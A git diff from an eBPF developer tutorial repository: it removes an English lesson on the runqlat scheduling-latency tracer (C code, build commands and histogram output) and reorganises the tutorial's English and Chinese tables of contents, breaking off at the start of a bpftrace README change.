If the `pid` value is 0 or the `targ_tgid` value is not 0 and not equal to `tgid`, the function returns 0. Otherwise, it retrieves the current timestamp using `bpf_ktime_get_ns` and updates the `start` map with the `pid` key and the timestamp value. - -```c -static int trace_enqueue(u32 tgid, u32 pid) -{ - u64 ts; - - if (!pid) - return 0; - if (targ_tgid && targ_tgid != tgid) - return 0; - - ts = bpf_ktime_get_ns(); - bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); - return 0; -} -``` - -- `pid_namespace`: This function is used to get the PID namespace of a process. It takes a `task_struct` pointer as a parameter and returns the PID namespace of the process. The function retrieves the PID namespace by following `task_active_pid_ns()` and `pid->numbers[pid->level].ns`. - -```c -static unsigned int pid_namespace(struct task_struct *task) -{ - struct pid *pid; - unsigned int level; - struct upid upid; - unsigned int inum; - - /* get the pid namespace by following task_active_pid_ns(), - * pid->numbers[pid->level].ns - */ - pid = BPF_CORE_READ(task, thread_pid); - level = BPF_CORE_READ(pid, level); - bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); - inum = BPF_CORE_READ(upid.ns, ns.inum); - - return inum; -} -``` - -The `handle_switch` function is the core part, used to handle scheduling switch events, calculate process scheduling latency, and update histogram data: - -```c -static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) -{ - ... -} -``` - -Firstly, the function determines whether to filter cgroup based on the setting of `filter_cg`. Then, if the previous process state is `TASK_RUNNING`, the `trace_enqueue` function is called to record the enqueue time of the process. Then, the function looks up the enqueue timestamp of the next process. If it is not found, it returns directly. The scheduling latency (delta) is calculated, and the key for the histogram map (hkey) is determined based on different options (targ_per_process, targ_per_thread, targ_per_pidns). Then, the histogram map is looked up or initialized, and the histogram data is updated. Finally, the enqueue timestamp record of the process is deleted. - -Next is the entry point of the eBPF program. The program uses three entry points to capture different scheduling events: - -- `handle_sched_wakeup`: Used to handle the `sched_wakeup` event triggered when a process is woken up from sleep state. -- `handle_sched_wakeup_new`: Used to handle the `sched_wakeup_new` event triggered when a newly created process is woken up. -- `handle_sched_switch`: Used to handle the `sched_switch` event triggered when the scheduler selects a new process to run. - -These entry points handle different scheduling events, but all call the `handle_switch` function to calculate the scheduling latency of the process and update the histogram data. - -Finally, the program includes a license declaration: - -```c -char LICENSE[] SEC("license") = "GPL"; -``` - -This declaration specifies the license type of the eBPF program, which is "GPL" in this case. This is required for many kernel features as they require eBPF programs to follow the GPL license. 
- -### runqlat.h - -Next, we need to define a header file `runqlat.h` for handling events reported from kernel mode to user mode: - -```c -/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ -#ifndef __RUNQLAT_H -#define __RUNQLAT_H - -#define TASK_COMM_LEN 16 -#define MAX_SLOTS 26 - -struct hist { - __u32 slots[MAX_SLOTS]; - char comm[TASK_COMM_LEN]; -}; - -#endif /* __RUNQLAT_H */ -``` - -## Compilation and Execution - -We will use `eunomia-bpf` to compile and run this example. You can refer to to download and install the `ecc` compilation toolkit and `ecli` runtime. - -Compile: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -or - -```console -$ ecc runqlat.bpf.c runqlat.h -Compiling bpf object... -Generating export types... -Packing ebpf object and config into package.json... -``` - -Run: - -```console -$ sudo ecli run examples/bpftools/runqlat/package.json -h -Usage: runqlat_bpf [--help] [--version] [--verbose] [--filter_cg] [--targ_per_process] [--targ_per_thread] [--targ_per_pidns] [--targ_ms] [--targ_tgid VAR] - -A simple eBPF program - -Optional arguments: --h, --help shows help message and exits --v, --version prints version information and exits ---verbose prints libbpf debug information ---filter_cg set value of bool variable filter_cg ---targ_per_process set value of bool variable targ_per_process ---targ_per_thread set value of bool variable targ_per_thread ---targ_per_pidns set value of bool variable targ_per_pidns ---targ_ms set value of bool variable targ_ms ---targ_tgid set value of pid_t variable targ_tgid - -$ sudo ecli run examples/bpftools/runqlat/package.json -key = 4294967295 -comm = rcu_preempt - - (unit) : count distribution - 0 -> 1 : 9 |**** | - 2 -> 3 : 6 |** | - 4 -> 7 : 12 |***** | - 8 -> 15 : 28 |************* | - 16 -> 31 : 40 |******************* | - 32 -> 63 : 83 |****************************************| - 64 -> 127 : 57 |*************************** | - 128 -> 255 : 19 |********* | - 256 -> 511 : 11 |***** | - 512 -> 1023 : 2 | | - 1024 -> 2047 : 2 | | - 2048 -> 4095 : 0 | | - 4096 -> 8191 : 0 | | - 8192 -> 16383 : 0 | | - 16384 -> 32767 : 1 | | - -$ sudo ecli run examples/bpftools/runqlat/package.json --targ_per_process -key = 3189 -comm = cpptools - - (unit) : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 1 |*** | - 16 -> 31 : 2 |******* | - 32 -> 63 : 11 |****************************************| - 64 -> 127 : 8 |***************************** | - 128 -> 255 : 3 |********** | - -``` - -Complete source code can be found at: - -References: - -- -- - -## Summary - -runqlat is a Linux kernel BPF program that summarizes scheduler run queue latency using a bar chart to show the length of time tasks wait to run on a CPU. To compile this program, you can use the `ecc` tool and to run it, you can use the `ecli` command. - -runqlat is a tool for monitoring process scheduling latency in the Linux kernel. It can help you understand the time processes spend waiting to run in the kernel and optimize process scheduling based on this information to improve system performance. The original source code can be found in libbpf-tools: - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. 
diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 5632b68..61c9ebe 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -1,69 +1,89 @@ -# eBPF 开发实践教程:基于 CO-RE,通过小工具快速上手 eBPF 开发 +# eBPF Tutorial by Example: Learning CO-RE eBPF Step by Step -这是一个基于 `CO-RE`(一次编译,到处运行)的 eBPF 的开发教程,提供了从入门到进阶的 eBPF 开发实践,包括基本概念、代码实例、实际应用等内容。和 BCC 不同的是,我们使用 libbpf、Cilium、libbpf-rs、eunomia-bpf 等框架进行开发,包含 C、Go、Rust 等语言的示例。 +[![CI](https://github.com/eunomia-bpf/bpf-developer-tutorial/actions/workflows/main.yml/badge.svg)](https://github.com/eunomia-bpf/bpf-developer-tutorial/actions/workflows/main.yml) -本教程不会进行复杂的概念讲解和场景介绍,主要希望提供一些 eBPF 小工具的案例(**非常短小,从二十行代码开始入门!**),来帮助 eBPF 应用的开发者快速上手 eBPF 的开发方法和技巧。教程内容可以在目录中找到,每个目录都是一个独立的 eBPF 工具案例。 +This is a development tutorial for eBPF based on CO-RE (Compile Once, Run Everywhere). It provides practical eBPF development practices from beginner to advanced, including basic concepts, code examples, and real-world applications. Unlike BCC, we use frameworks like libbpf, Cilium, libbpf-rs, and eunomia-bpf for development, with examples in languages such as C, Go, and Rust. -教程关注于可观测性、网络、安全等等方面的 eBPF 示例。完整的代码和教程可以在 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) GitHub 开源仓库中找到。**如果您认为本教程对您有所帮助,也请给我们一个 star 鼓励一下!** +This tutorial does not cover complex concepts and scenario introductions. Its main purpose is to provide examples of eBPF tools (**very short, starting with twenty lines of code!**) to help eBPF application developers quickly grasp eBPF development methods and techniques. The tutorial content can be found in the directory, with each directory being an independent eBPF tool example. -# 入门文档 +For the complete source code of the tutorial, please refer to the repo [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) on GitHub. **If you find this tutorial helpful, please give us a star!** -包含简单的 eBPF 程序样例与介绍,这部分主要使用 `eunomia-bpf` 框架简化开发,并介绍了 eBPF 的基本使用方式和开发流程。 +# Getting Started Examples -- [lesson 0-introduce](0-introduce/README.md) 介绍 eBPF 的基本概念和常见的开发工具 -- [lesson 1-helloworld](1-helloworld/README.md) 使用 eBPF 开发最简单的「Hello World」程序,介绍 eBPF 的基本框架和开发流程 -- [lesson 2-kprobe-unlink](2-kprobe-unlink/README.md) 在 eBPF 中使用 kprobe 捕获 unlink 系统调用 -- [lesson 3-fentry-unlink](3-fentry-unlink/README.md) 在 eBPF 中使用 fentry 捕获 unlink 系统调用 -- [lesson 4-opensnoop](4-opensnoop/README.md) 使用 eBPF 捕获进程打开文件的系统调用集合,使用全局变量在 eBPF 中过滤进程 pid -- [lesson 5-uprobe-bashreadline](5-uprobe-bashreadline/README.md) 在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 -- [lesson 6-sigsnoop](6-sigsnoop/README.md) 捕获进程发送信号的系统调用集合,使用 hash map 保存状态 -- [lesson 7-execsnoop](7-execsnoop/README.md) 捕获进程执行时间,通过 perf event array 向用户态打印输出 -- [lesson 8-execsnoop](8-exitsnoop/README.md) 捕获进程退出事件,使用 ring buffer 向用户态打印输出 -- [lesson 9-runqlat](9-runqlat/README.md) 捕获进程调度延迟,以直方图方式记录 -- [lesson 10-hardirqs](10-hardirqs/README.md) 使用 hardirqs 或 softirqs 捕获中断事件 +This section contains simple eBPF program examples and introductions. It primarily utilizes the `eunomia-bpf` framework to simplify development and introduces the basic usage and development process of eBPF. 
-# 进阶文档和示例 +- [lesson 0-introduce](0-introduce/README.md) Introduction to Core Concepts and Tools +- [lesson 1-helloworld](1-helloworld/README.md) Hello World, Framework and Development +- [lesson 2-kprobe-unlink](2-kprobe-unlink/README.md) Monitoring unlink System Calls with kprobe +- [lesson 3-fentry-unlink](3-fentry-unlink/README.md) Monitoring unlink System Calls with fentry +- [lesson 4-opensnoop](4-opensnoop/README.md) Capturing Opening Files and Filter with Global Variables +- [lesson 5-uprobe-bashreadline](5-uprobe-bashreadline/README.md) Capturing readline Function Calls with Uprobe +- [lesson 6-sigsnoop](6-sigsnoop/README.md) Capturing Signal Sending and Store State with Hash Maps +- [lesson 7-execsnoop](7-execsnoop/README.md) Capturing Process Execution, Output with perf event array +- [lesson 8-exitsnoop](8-exitsnoop/README.md) Monitoring Process Exit Events, Output with Ring Buffer +- [lesson 9-runqlat](9-runqlat/README.md) Capturing Scheduling Latency and Recording as Histogram +- [lesson 10-hardirqs](10-hardirqs/README.md) Capturing Interrupts with hardirqs or softirqs -我们开始主要基于 `libbpf` 构建完整的 eBPF 工程,并且把它和各种应用场景结合起来进行实践。 +# Advanced Documents and Examples -- [lesson 11-bootstrap](11-bootstrap/README.md) 使用 libbpf-bootstrap 为 eBPF 编写原生的 libbpf 用户态代码,并建立完整的 libbpf 工程。 -- [lesson 12-profile](12-profile/README.md) 使用 eBPF 进行性能分析 -- [lesson 13-tcpconnlat](13-tcpconnlat/README.md) 记录 TCP 连接延迟,并使用 libbpf 在用户态处理数据 -- [lesson 14-tcpstates](14-tcpstates/README.md) 记录 TCP 连接状态与 TCP RTT -- [lesson 15-javagc](15-javagc/README.md) 使用 usdt 捕获用户态 Java GC 事件耗时 -- [lesson 16-memleak](16-memleak/README.md) 检测内存泄漏 -- [lesson 17-biopattern](17-biopattern/README.md) 捕获磁盘 IO 模式 -- [lesson 18-further-reading](18-further-reading/README.md) 更进一步的相关资料:论文列表、项目、博客等等 -- [lesson 19-lsm-connect](19-lsm-connect/README.md) 使用 LSM 进行安全检测防御 -- [lesson 20-tc](20-tc/README.md) 使用 eBPF 进行 tc 流量控制 -- [lesson 21-xdp](21-xdp/README.md) 使用 eBPF 进行 XDP 报文处理 +We start to build complete eBPF projects mainly based on `libbpf` and combine them with various application scenarios for practical use. 
-# 高级主题 +- [lesson 11-bootstrap](11-bootstrap/README.md) Develop User-Space Programs with libbpf and Trace exec() and exit() +- [lesson 12-profile](12-profile/README.md) Using eBPF Program Profile for Performance Analysis +- [lesson 13-tcpconnlat](13-tcpconnlat/README.md) Statistics of TCP Connection Delay with libbpf +- [lesson 14-tcpstates](14-tcpstates/README.md) Recording TCP Connection Status and TCP RTT +- [lesson 15-javagc](15-javagc/README.md) Capturing User-Space Java GC Duration Using USDT +- [lesson 16-memleak](16-memleak/README.md) Monitoring Memory Leaks +- [lesson 17-biopattern](17-biopattern/README.md) Count Random/Sequential Disk I/O +- [lesson 18-further-reading](18-further-reading/README.md) More Reference Materials: papers, projects +- [lesson 19-lsm-connect](19-lsm-connect/README.md) Security Detection and Defense using LSM +- [lesson 20-tc](20-tc/README.md) tc Traffic Control +- [lesson 21-xdp](21-xdp/README.md) Programmable Packet Processing with XDP -这里涵盖了一系列和 eBPF 相关的高级内容,包含在 Android 上使用 eBPF 程序、使用 eBPF 程序进行可能的攻击与防御、复杂的追踪等等。这部分主要基于 libbpf、Cilium 等框架进行开发。 +# In-Depth Topics -- [在 Android 上使用 eBPF 程序](22-android/README.md) -- [使用 uprobe 捕获多种库的 SSL/TLS 明文数据](30-sslsniff/README.md) -- [使用 eBPF socket filter 或 syscall trace 追踪 HTTP 请求和其他七层协议](23-http/README.md) -- [使用 sockops 加速网络请求转发](29-sockops/README.md) -- [使用 eBPF 隐藏进程或文件信息](24-hide/README.md) -- [使用 bpf_send_signal 发送信号终止进程](25-signal/README.md) -- [使用 eBPF 添加 sudo 用户](26-sudo/README.md) -- [使用 eBPF 替换任意程序读取或写入的文本](27-replace/README.md) -- [BPF 的生命周期:使用 Detached 模式在用户态应用退出后持续运行 eBPF 程序](28-detach/README.md) -- [eBPF 运行时的安全性与面临的挑战](18-further-reading/ebpf-security.zh.md) -- [使用 eBPF 修改系统调用参数](34-syscall/README.md) -- [eBPF开发实践:使用 user ring buffer 向内核异步发送信息](35-user-ringbuf/README.md) -- [用户空间 eBPF 运行时:深度解析与应用实践](36-userspace-ebpf/README.md) -- [使用 uprobe 追踪 Rust 应用程序](37-uprobe-rust/README.md) -- [借助 eBPF 和 BTF,让用户态也能一次编译、到处运行](38-btf-uprobe/README.md) +This section covers advanced topics related to eBPF, including using eBPF programs on Android, possible attacks and defenses using eBPF programs, and complex tracing. Combining the user-mode and kernel-mode aspects of eBPF can bring great power (as well as security risks). 
-# bcc 和 bpftrace 教程与文档
+
+Android:
+
+- [lesson 22-android](22-android/README.md) Using eBPF Programs on Android
+
+Networking:
+
+- [lesson 23-http](23-http/README.md) L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints
+- [lesson 29-sockops](29-sockops/README.md) Accelerating Network Request Forwarding with Sockops
+- [lesson 41-xdp-tcpdump](41-xdp-tcpdump/README.md) Capturing TCP Information with XDP
+- [lesson 42-xdp-loadbalancer](42-xdp-loadbalancer/README.md) XDP Load Balancer
+
+Security:
+
+- [lesson 24-hide](24-hide/README.md) Hiding Process or File Information
+- [lesson 25-signal](25-signal/README.md) Using bpf_send_signal to Terminate Malicious Processes in eBPF
+- [lesson 26-sudo](26-sudo/README.md) Using eBPF to add sudo user
+- [lesson 27-replace](27-replace/README.md) Replace Text Read or Written by Any Program with eBPF
+- [lesson 28-detach](28-detach/README.md) Running eBPF After Application Exits: The Lifecycle of eBPF Programs
+- [lesson 34-syscall](34-syscall/README.md) Modifying System Call Arguments with eBPF
+
+Scheduler:
+
+- [lesson 44-scx-simple](44-scx-simple/README.md) Introduction to the BPF Scheduler
+
+Other:
+
+- [lesson 35-user-ringbuf](35-user-ringbuf/README.md) Asynchronously Send to Kernel with User Ring Buffer
+- [lesson 36-userspace-ebpf](36-userspace-ebpf/README.md) Userspace eBPF Runtimes: Overview and Applications
+- [lesson 38-btf-uprobe](38-btf-uprobe/README.md) Expanding eBPF Compile Once, Run Everywhere (CO-RE) to Userspace Compatibility
+- [lesson 43-kfuncs](43-kfuncs/README.md) Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules
+
+Continuously updating...
+
+# bcc and bpftrace tutorial
+
+For reference:
+
 - [BPF Features by Linux Kernel Version](bcc-documents/kernel-versions.md)
 - [Kernel Configuration for BPF Features](bcc-documents/kernel_config.md)
 - [bcc Reference Guide](bcc-documents/reference_guide.md)
 - [Special Filtering](bcc-documents/special_filtering.md)
-- [bcc Tutorial](bcc-documents/tutorial.md)
-- [bcc Python Developer Tutorial](bcc-documents/tutorial_bcc_python_developer.md)
+- [bcc Tutorial](bcc-documents/tutorial.md)
+- [bcc Python Developer Tutorial](bcc-documents/tutorial_bcc_python_developer.md)
 - [bpftrace Tutorial](bpftrace-tutorial/README.md)
diff --git a/src/SUMMARY.zh.md b/src/SUMMARY.zh.md
new file mode 100644
index 0000000..cad39d3
--- /dev/null
+++ b/src/SUMMARY.zh.md
@@ -0,0 +1,82 @@
+# eBPF 开发实践教程:基于 CO-RE,通过小工具快速上手 eBPF 开发
+
+这是一个基于 `CO-RE`(一次编译,到处运行)的 eBPF 的开发教程,提供了从入门到进阶的 eBPF 开发实践,包括基本概念、代码实例、实际应用等内容。和 BCC 不同的是,我们使用 libbpf、Cilium、libbpf-rs、eunomia-bpf 等框架进行开发,包含 C、Go、Rust 等语言的示例。
+
+本教程不会进行复杂的概念讲解和场景介绍,主要希望提供一些 eBPF 小工具的案例(**非常短小,从二十行代码开始入门!**),来帮助 eBPF 应用的开发者快速上手 eBPF 的开发方法和技巧。教程内容可以在目录中找到,每个目录都是一个独立的 eBPF 工具案例。
+
+教程关注于可观测性、网络、安全等等方面的 eBPF 示例。完整的代码和教程可以在 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) GitHub 开源仓库中找到。**如果您认为本教程对您有所帮助,也请给我们一个 star 鼓励一下!**
+
+# 入门示例
+
+这一部分包含简单的 eBPF 程序示例和介绍。主要利用 `eunomia-bpf` 框架简化开发,介绍 eBPF 的基本用法和开发流程。
+
+- [lesson 0-introduce](0-introduce/README.zh.md) eBPF 示例教程 0:核心概念与工具简介
+- [lesson 1-helloworld](1-helloworld/README.zh.md) eBPF 入门开发实践教程一:Hello World,基本框架和开发流程
+- [lesson 2-kprobe-unlink](2-kprobe-unlink/README.zh.md) eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用
+- [lesson 3-fentry-unlink](3-fentry-unlink/README.zh.md) eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用
+- [lesson 4-opensnoop](4-opensnoop/README.zh.md) eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid
+- [lesson 5-uprobe-bashreadline](5-uprobe-bashreadline/README.zh.md) eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用
+- [lesson 6-sigsnoop](6-sigsnoop/README.zh.md) eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态
+- [lesson 7-execsnoop](7-execsnoop/README.zh.md) eBPF 入门实践教程七:捕获进程执行事件,通过 perf event array 向用户态打印输出
+- [lesson 8-exitsnoop](8-exitsnoop/README.zh.md) eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出
+- [lesson 9-runqlat](9-runqlat/README.zh.md) eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录
+- [lesson 10-hardirqs](10-hardirqs/README.zh.md) eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件
+
+# 高级文档和示例
+
+我们开始构建完整的 eBPF 项目,主要基于 `libbpf`,并将其与各种应用场景结合起来,以便实际使用。
+
+- [lesson 11-bootstrap](11-bootstrap/README.zh.md) eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用
+- [lesson 12-profile](12-profile/README.zh.md) eBPF 入门实践教程十二:使用 eBPF 程序 profile 进行性能分析
+- [lesson 13-tcpconnlat](13-tcpconnlat/README.zh.md) eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据
+- [lesson 14-tcpstates](14-tcpstates/README.zh.md) eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT
+- [lesson 15-javagc](15-javagc/README.zh.md) eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时
+- [lesson 16-memleak](16-memleak/README.zh.md) eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏
+- [lesson 17-biopattern](17-biopattern/README.zh.md) eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O
+- [lesson 18-further-reading](18-further-reading/README.zh.md) 更多的参考资料:论文、项目等等
+- [lesson 19-lsm-connect](19-lsm-connect/README.zh.md) eBPF 入门实践教程:使用 LSM 进行安全检测防御
+- [lesson 20-tc](20-tc/README.zh.md) eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制
+- [lesson 21-xdp](21-xdp/README.zh.md) eBPF 入门实践教程二十一: 使用 XDP 进行可编程数据包处理
+
+# 深入主题
+
+这一部分涵盖了与 eBPF 相关的高级主题,包括在 Android 上使用 eBPF 程序、利用 eBPF 程序进行的潜在攻击和防御以及复杂的追踪。结合用户模式和内核模式的 eBPF 可以带来强大的能力(也可能带来安全风险)。
+
+Android:
+
+- [lesson 22-android](22-android/README.zh.md) 在 Android 上使用 eBPF 程序
+
+网络:
+
+- [lesson 23-http](23-http/README.zh.md) 通过 eBPF socket filter 或 syscall trace 追踪 HTTP 请求等七层协议 - eBPF 实践教程
+- [lesson 29-sockops](29-sockops/README.zh.md) eBPF 开发实践:使用 sockops 加速网络请求转发
+- [lesson 41-xdp-tcpdump](41-xdp-tcpdump/README.zh.md) eBPF 示例教程:使用 XDP 捕获 TCP 信息
+- [lesson 42-xdp-loadbalancer](42-xdp-loadbalancer/README.zh.md) eBPF 开发者教程: 简单的 XDP 负载均衡器
+
+安全:
+
+- [lesson 24-hide](24-hide/README.zh.md) eBPF 开发实践:使用 eBPF 隐藏进程或文件信息
+- [lesson 25-signal](25-signal/README.zh.md) eBPF 入门实践教程:用 bpf_send_signal 发送信号终止恶意进程
+- [lesson 26-sudo](26-sudo/README.zh.md) 使用 eBPF 添加 sudo 用户
+- [lesson 27-replace](27-replace/README.zh.md) 使用 eBPF 替换任意程序读取或写入的文本
+- [lesson 28-detach](28-detach/README.zh.md) 在应用程序退出后运行 eBPF 程序:eBPF 程序的生命周期
+- [lesson 34-syscall](34-syscall/README.zh.md) eBPF 开发实践:使用 eBPF 修改系统调用参数
+
+调度器:
+
+- [lesson 44-scx-simple](44-scx-simple/README.zh.md) BPF 调度器简介
+
+其他:
+
+- [lesson 35-user-ringbuf](35-user-ringbuf/README.zh.md) eBPF开发实践:使用 user ring buffer 向内核异步发送信息
+- [lesson 36-userspace-ebpf](36-userspace-ebpf/README.zh.md) 用户空间 eBPF 运行时:深度解析与应用实践
+- [lesson 38-btf-uprobe](38-btf-uprobe/README.zh.md) 借助 eBPF 和 BTF,让用户态也能一次编译、到处运行
+- [lesson 43-kfuncs](43-kfuncs/README.zh.md) 超越 eBPF 的极限:在内核模块中定义自定义 kfunc
+
+持续更新中...
+ +# bcc 和 bpftrace 教程与文档 + +- [BPF Features by Linux Kernel Version](bcc-documents/kernel-versions.md) +- [Kernel Configuration for BPF Features](bcc-documents/kernel_config.md) +- [bcc Reference Guide](bcc-documents/reference_guide.md) +- [Special Filtering](bcc-documents/special_filtering.md) +- [bcc Tutorial](bcc-documents/tutorial.md) +- [bcc Python Developer Tutorial](bcc-documents/tutorial_bcc_python_developer.md) +- [bpftrace Tutorial](bpftrace-tutorial/README.md) diff --git a/src/SUMMARY_en.md b/src/SUMMARY_en.md deleted file mode 100644 index 8e78a74..0000000 --- a/src/SUMMARY_en.md +++ /dev/null @@ -1,89 +0,0 @@ -# eBPF Tutorial by Example: Learning CO-RE eBPF Step by Step - -[![CI](https://github.com/eunomia-bpf/bpf-developer-tutorial/actions/workflows/main.yml/badge.svg)](https://github.com/eunomia-bpf/bpf-developer-tutorial/actions/workflows/main.yml) - -This is a development tutorial for eBPF based on CO-RE (Compile Once, Run Everywhere). It provides practical eBPF development practices from beginner to advanced, including basic concepts, code examples, and real-world applications. Unlike BCC, we use frameworks like libbpf, Cilium, libbpf-rs, and eunomia-bpf for development, with examples in languages such as C, Go, and Rust. - -This tutorial does not cover complex concepts and scenario introductions. Its main purpose is to provide examples of eBPF tools (**very short, starting with twenty lines of code!**) to help eBPF application developers quickly grasp eBPF development methods and techniques. The tutorial content can be found in the directory, with each directory being an independent eBPF tool example. - -For the complete source code of the tutorial, please refer to the repo [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) on GitHub. **If you find this tutorial helpful, please give us a star!** - -# Getting Started Examples - -This section contains simple eBPF program examples and introductions. It primarily utilizes the `eunomia-bpf` framework to simplify development and introduces the basic usage and development process of eBPF. - -- [lesson 0-introduce](0-introduce/README_en.md) Introduction to Core Concepts and Tools -- [lesson 1-helloworld](1-helloworld/README_en.md) Hello World, Framework and Development -- [lesson 2-kprobe-unlink](2-kprobe-unlink/README_en.md) Monitoring unlink System Calls with kprobe -- [lesson 3-fentry-unlink](3-fentry-unlink/README_en.md) Monitoring unlink System Calls with fentry -- [lesson 4-opensnoop](4-opensnoop/README_en.md) Capturing Opening Files and Filter with Global Variables -- [lesson 5-uprobe-bashreadline](5-uprobe-bashreadline/README_en.md) Capturing readline Function Calls with Uprobe -- [lesson 6-sigsnoop](6-sigsnoop/README_en.md) Capturing Signal Sending and Store State with Hash Maps -- [lesson 7-execsnoop](7-execsnoop/README_en.md) Capturing Process Execution, Output with perf event array -- [lesson 8-exitsnoop](8-exitsnoop/README_en.md) Monitoring Process Exit Events, Output with Ring Buffer -- [lesson 9-runqlat](9-runqlat/README_en.md) Capturing Scheduling Latency and Recording as Histogram -- [lesson 10-hardirqs](10-hardirqs/README_en.md) Capturing Interrupts with hardirqs or softirqs - -# Advanced Documents and Examples - -We start to build complete eBPF projects mainly based on `libbpf` and combine them with various application scenarios for practical use. 
- -- [lesson 11-bootstrap](11-bootstrap/README_en.md) Develop User-Space Programs with libbpf and Trace exec() and exit() -- [lesson 12-profile](12-profile/README_en.md) Using eBPF Program Profile for Performance Analysis -- [lesson 13-tcpconnlat](13-tcpconnlat/README_en.md) Statistics of TCP Connection Delay with libbpf -- [lesson 14-tcpstates](14-tcpstates/README_en.md) Recording TCP Connection Status and TCP RTT -- [lesson 15-javagc](15-javagc/README_en.md) Capturing User-Space Java GC Duration Using USDT -- [lesson 16-memleak](16-memleak/README_en.md) Monitoring Memory Leaks -- [lesson 17-biopattern](17-biopattern/README_en.md) Count Random/Sequential Disk I/O -- [lesson 18-further-reading](18-further-reading/README_en.md) More Reference Materials: papers, projects -- [lesson 19-lsm-connect](19-lsm-connect/README_en.md) Security Detection and Defense using LSM -- [lesson 20-tc](20-tc/README_en.md) tc Traffic Control -- [lesson 21-xdp](21-xdp/README_en.md) Programmable Packet Processing with XDP - -# In-Depth Topics - -This section covers advanced topics related to eBPF, including using eBPF programs on Android, possible attacks and defenses using eBPF programs, and complex tracing. Combining the user-mode and kernel-mode aspects of eBPF can bring great power (as well as security risks). - -Android: - -- [lesson 22-android](22-android/README_en.md) Using eBPF Programs on Android - -Networking: - -- [lesson 23-http](23-http/README_en.md) L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints -- [lesson 29-sockops](29-sockops/README_en.md) Accelerating Network Request Forwarding with Sockops -- [lesson 41-xdp-tcpdump](41-xdp-tcpdump/README_en.md) Capturing TCP Information with XDP -- [lesson 42-xdp-loadbalancer](42-xdp-loadbalancer/README_en.md) XDP Load Balancer - -Security: - -- [lesson 24-hide](24-hide/README_en.md) Hiding Process or File Information -- [lesson 25-signal](25-signal/README_en.md) Using bpf_send_signal to Terminate Malicious Processes in eBPF -- [lesson 26-sudo](26-sudo/README_en.md) Using eBPF to add sudo user -- [lesson 27-replace](27-replace/README_en.md) Replace Text Read or Written by Any Program with eBPF -- [lesson 28-detach](28-detach/README_en.md) Running eBPF After Application Exits: The Lifecycle of eBPF Programs -- [lesson 34-syscall](34-syscall/README_en.md) Modifying System Call Arguments with eBPF - -Scheduler: - -- [lesson 44-scx-simple](44-scx-simple/README_en.md) Introduction to the BPF Scheduler - -Other: - -- [lesson 35-user-ringbuf](35-user-ringbuf/README_en.md) Asynchronously Send to Kernel with User Ring Buffer -- [lesson 36-userspace-ebpf](36-userspace-ebpf/README_en.md) Userspace eBPF Runtimes: Overview and Applications -- [lesson 38-btf-uprobe](38-btf-uprobe/README_en.md) Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility -- [lesson 43-kfuncs](43-kfuncs/README_en.md) Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules - -Continuously updating... 
-
-# bcc and bpftrace tutorial
-
-For reference:
-
-- [BPF Features by Linux Kernel Version](bcc-documents/kernel-versions.md)
-- [Kernel Configuration for BPF Features](bcc-documents/kernel_config.md)
-- [bcc Reference Guide](bcc-documents/reference_guide.md)
-- [Special Filtering](bcc-documents/special_filtering.md)
-- [bcc Tutorial](bcc-documents/tutorial.md)
-- [bcc Python Developer Tutorial](bcc-documents/tutorial_bcc_python_developer.md)
-- [bpftrace Tutorial](bpftrace-tutorial/README.md)
diff --git a/src/bpftrace-tutorial/README.md b/src/bpftrace-tutorial/README.md
index 010f506..bb5788b 100644
--- a/src/bpftrace-tutorial/README.md
+++ b/src/bpftrace-tutorial/README.md
@@ -1,22 +1,22 @@
-# bpftrace一行教程
+# The bpftrace One-Liner Tutorial

-该教程通过12个简单小节帮助你了解bpftrace的使用。每一小节都是一行的命令,你可以尝试运行并立刻看到运行效果。该教程系列用来介绍bpftrace的概念。关于bpftrace的完整参考,见[bpftrace手册](https://github.com/iovisor/bpftrace/blob/master/man/adoc/bpftrace.adoc)。
